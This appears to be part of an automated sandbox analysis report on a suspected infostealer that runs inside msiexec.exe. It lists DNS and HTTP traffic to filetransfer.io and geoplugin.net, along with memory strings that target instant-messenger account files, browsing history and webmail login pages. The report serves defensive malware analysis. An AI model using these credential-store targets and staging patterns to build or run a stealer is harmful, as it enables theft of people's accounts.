              Source: global trafficHTTP traffic detected: GET /crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /config/v1/Edge/94.0.992.31?clientId=6757335511995507682&osname=win&client=edge&channel=stable&scpfull=0&scpguard=0&scpfre=0&osver=10.0.19042&osarch=x86_64&osedition=professional&wu=1&devicefamily=desktop&uma=0&mngd=0&installdate=1630626147 HTTP/1.1Host: config.edge.skype.comConnection: keep-aliveIf-None-Match: "mOB9Fluqaq+mietxhYXSL2cAH0KxdzECs1csHpZVA18="Accept-Encoding: gzipSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: msiexec.exe, 00000009.00000003.144184175754.0000000004D31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy"
:"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_override":{"applications":[{"applied_policy":"OptIn","domain":"youtube.com","path_exclude":["/shorts","/kids"],"subdomain_exclude":["tv.youtube.com","studio.youtube.com","vr.youtube.com"]}],"policies":[{"name":"OptIn","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"version":1},"web_notification_ov
              Source: msiexec.exe, 00000004.00000002.148901845750.0000000021E20000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000B.00000002.144171198666.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: msiexec.exe, msiexec.exe, 0000000B.00000002.144171198666.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: msiexec.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: chrome.exe, 00000008.00000002.144258729862.000012AC00640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258258607.000012AC00510000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144262325708.000012AC00D8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
              Source: chrome.exe, 00000008.00000002.144258258607.000012AC00510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html7 equals www.youtube.com (Youtube)
              Source: msiexec.exe, 00000009.00000003.144189148646.000000000331A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ld=16.0.14326&p=0&a=1&hm=1&sp=0&fpEnabled=1https://odc.officeapps.live.com/odc/v2.1/hrdres://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: msiexec.exe, 00000009.00000003.144189148646.000000000331A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ld=16.0.14326&p=0&a=1&hm=1&sp=0&fpEnabled=1https://odc.officeapps.live.com/odc/v2.1/hrdres://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: msiexec.exe, 00000004.00000002.148901215405.0000000021CF0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: msiexec.exe, 00000004.00000002.148901215405.0000000021CF0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: filetransfer.io
              Source: global trafficDNS traffic detected: DNS query: s20.filetransfer.io
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
              Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
              Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
              Source: global trafficDNS traffic detected: DNS query: assets.msn.com
              Source: global trafficDNS traffic detected: DNS query: api.msn.com
              Source: global trafficDNS traffic detected: DNS query: c.msn.com
              Source: global trafficDNS traffic detected: DNS query: deff.nelreports.net
              Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
              Source: global trafficDNS traffic detected: DNS query: dns.quad9.net
              Source: unknownHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19042.0.0; IDCRL-cfg 16.000.29143.3; App svchost.exe, 10.0.19041.546, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4742Host: login.live.com
              Source: global trafficTCP traffic: 192.168.11.20:57096 -> 239.255.255.250:1900
              Source: global trafficTCP traffic: 192.168.11.20:59059 -> 239.255.255.250:1900
              Source: chrome.exe, 00000008.00000002.144258771870.000012AC006B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
              Source: msedge.exe, 0000000F.00000002.144316730054.0000642800454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.144303100044.0000642800450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1452
              Source: msedge.exe, 0000000F.00000002.144316730054.0000642800454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.144303100044.0000642800450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2152
              Source: msedge.exe, 0000000F.00000002.144316730054.0000642800454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.144303100044.0000642800450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3246
              Source: msedge.exe, 0000000F.00000002.144316730054.0000642800454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.144303100044.0000642800450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3682
              Source: chrome.exe, 00000008.00000002.144261762952.000012AC00C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/40096371
              Source: chrome.exe, 00000008.00000002.144261762952.000012AC00C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/40096608
              Source: chrome.exe, 00000008.00000002.144261762952.000012AC00C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/40096838
              Source: chrome.exe, 00000008.00000002.144261762952.000012AC00C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/40644627
              Source: chrome.exe, 00000008.00000002.144261762952.000012AC00C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258771870.000012AC006B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/40644912
              Source: chrome.exe, 00000008.00000002.144261762952.000012AC00C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258978540.000012AC0070C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/41488637
              Source: chrome.exe, 00000008.00000002.144261762952.000012AC00C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42261924
              Source: chrome.exe, 00000008.00000002.144258771870.000012AC006B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42263580
              Source: chrome.exe, 00000008.00000002.144261762952.000012AC00C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42264193
              Source: chrome.exe, 00000008.00000002.144261762952.000012AC00C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42264287
              Source: chrome.exe, 00000008.00000002.144261762952.000012AC00C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42264571
              Source: chrome.exe, 00000008.00000002.144258978540.000012AC0070C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42265509
              Source: chrome.exe, 00000008.00000002.144258771870.000012AC006B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42266194
              Source: chrome.exe, 00000008.00000002.144258771870.000012AC006B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42266231
              Source: chrome.exe, 00000008.00000002.144261762952.000012AC00C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42266232
              Source: chrome.exe, 00000008.00000002.144258978540.000012AC0070C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42266842
              Source: msedge.exe, 0000000F.00000002.144316730054.0000642800454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.144303100044.0000642800450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4722
              Source: msedge.exe, 0000000F.00000002.144316730054.0000642800454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.144303100044.0000642800450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5007
              Source: msedge.exe, 0000000F.00000002.144316730054.0000642800454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.144303100044.0000642800450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5750
              Source: msedge.exe, 0000000F.00000002.144316730054.0000642800454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.144303100044.0000642800450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6041
              Source: bhvB3DD.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhvB3DD.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
              Source: chrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clients2.google.com/time/1/current
              Source: chrome.exe, 00000008.00000002.144259921127.000012AC0086C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=128
              Source: msedge.exe, 0000000F.00000002.144316730054.0000642800454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.144303100044.0000642800450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crbug.com/1165751
              Source: chrome.exe, 00000008.00000002.144261807161.000012AC00C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144206111077.000012AC00C9C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000002.144316730054.0000642800454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.144303100044.0000642800450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crbug.com/941620
              Source: powershell.exe, 00000002.00000002.144017518011.000000000303E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144118475021.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.148892015439.00000000054A1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144079911503.00000000054B6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144080071726.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144377552368.00000000054A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: powershell.exe, 00000002.00000002.144017518011.000000000303E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144118475021.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.148892015439.00000000054A1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144079911503.00000000054B6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144080071726.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144377552368.00000000054A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: powershell.exe, 00000002.00000002.144018533141.0000000003277000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micr
              Source: bhvB3DD.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhvB3DD.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhvB3DD.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: chrome.exe, 00000008.00000002.144263008450.000012AC00EC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dns-tunnel-check.googlezip.net/connect
              Source: chrome.exe, 00000008.00000002.144257461471.000012AC003A1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144230458674.000012AC003A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromew
              Source: chrome.exe, 00000008.00000002.144257461471.000012AC003A1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144230458674.000012AC003A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewbstore/
              Source: chrome.exe, 00000008.00000002.144260042929.000012AC008A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUwy
              Source: msiexec.exe, 00000004.00000003.144377552368.0000000005496000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.148899066974.0000000021140000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144143401043.0000000021162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: msiexec.exe, 00000004.00000002.148899066974.0000000021140000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpq
              Source: msiexec.exe, 00000004.00000003.144377552368.0000000005496000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.148892015439.0000000005496000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpt
              Source: chrome.exe, 00000008.00000002.144255665782.000012AC000A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.com/
              Source: rPO3799039985.exe, rPO3799039985.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
              Source: rPO3799039985.exe, rPO3799039985.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: powershell.exe, 00000002.00000002.144023424474.0000000005F29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: bhvB3DD.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0
              Source: powershell.exe, 00000002.00000002.144019020175.0000000005018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.144019020175.0000000005018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png4
              Source: powershell.exe, 00000002.00000002.144019020175.0000000004EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: chrome.exe, 00000008.00000002.144260631416.000012AC009A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://unisolated.invalid/
              Source: powershell.exe, 00000002.00000002.144019020175.0000000005018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000002.00000002.144019020175.0000000005018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
              Source: chrome.exe, 00000008.00000002.144262805081.000012AC00E50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144263390938.000012AC00F68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
              Source: chrome.exe, 00000008.00000002.144262805081.000012AC00E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=searchTerms
              Source: powershell.exe, 00000002.00000002.144019020175.0000000005018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.144019020175.0000000005018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester4
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
              Source: msedge.exe, 0000000F.00000002.144314485430.00006428000A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
              Source: chrome.exe, 00000008.00000003.144169246553.000012A800468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/search
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleusercontent.com/
              Source: chrome.exe, 00000008.00000003.144169246553.000012A800468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleusercontent.comb
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
              Source: Reporting and NEL.20.drString found in binary or memory: https://identity.nel.measure.office.net/api/report?catId=GW
              Source: chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144206111077.000012AC00C9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
              Source: chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144206111077.000012AC00C9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/292285899
              Source: chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144206111077.000012AC00C9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/349489248
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
              Source: msiexec.exe, 00000009.00000002.144190715637.0000000004D2E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.144187932890.0000000004D2E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.144189871263.0000000002E8F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
              Source: msiexec.exe, 00000009.00000002.144189871263.0000000002E8F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/$E
              Source: msiexec.exe, 00000009.00000002.144190715637.0000000004D2E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.144187932890.0000000004D2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
              Source: msiexec.exe, 00000009.00000002.144190715637.0000000004D2E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.144187932890.0000000004D2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
              Source: Tabs_13375782673925510.17.drString found in binary or memory: https://login.microsoftonline.com
              Source: Tabs_13375782673925510.17.drString found in binary or memory: https://login.microsoftonline.com/
              Source: msiexec.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: chrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://m.google.com/devicemanagement/data/api
              Source: chrome.exe, 00000008.00000003.144169246553.000012A800468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/chat/u/0/?check_pwa_migration_eligible=123
              Source: chrome.exe, 00000008.00000002.144263481982.000012AC00F8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144260631416.000012AC009A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/
              Source: chrome.exe, 00000008.00000002.144259144198.000012AC00766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/:
              Source: chrome.exe, 00000008.00000002.144263481982.000012AC00F8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144260631416.000012AC009A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144262805081.000012AC00E50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144259144198.000012AC00766000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144265218991.000012AC01304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
              Source: chrome.exe, 00000008.00000002.144265403166.000012AC01398000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144259144198.000012AC00766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/J
              Source: chrome.exe, 00000008.00000002.144264156374.000012AC01094000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144260879436.000012AC00A44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258729862.000012AC00640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144259144198.000012AC00766000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144262325708.000012AC00D8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144263261282.000012AC00F38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
              Source: chrome.exe, 00000008.00000002.144263261282.000012AC00F38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_defaulter7
              Source: msedge.exe, 0000000F.00000002.144314485430.00006428000A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
              Source: msedge.exe, 0000000F.00000002.144314485430.00006428000A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
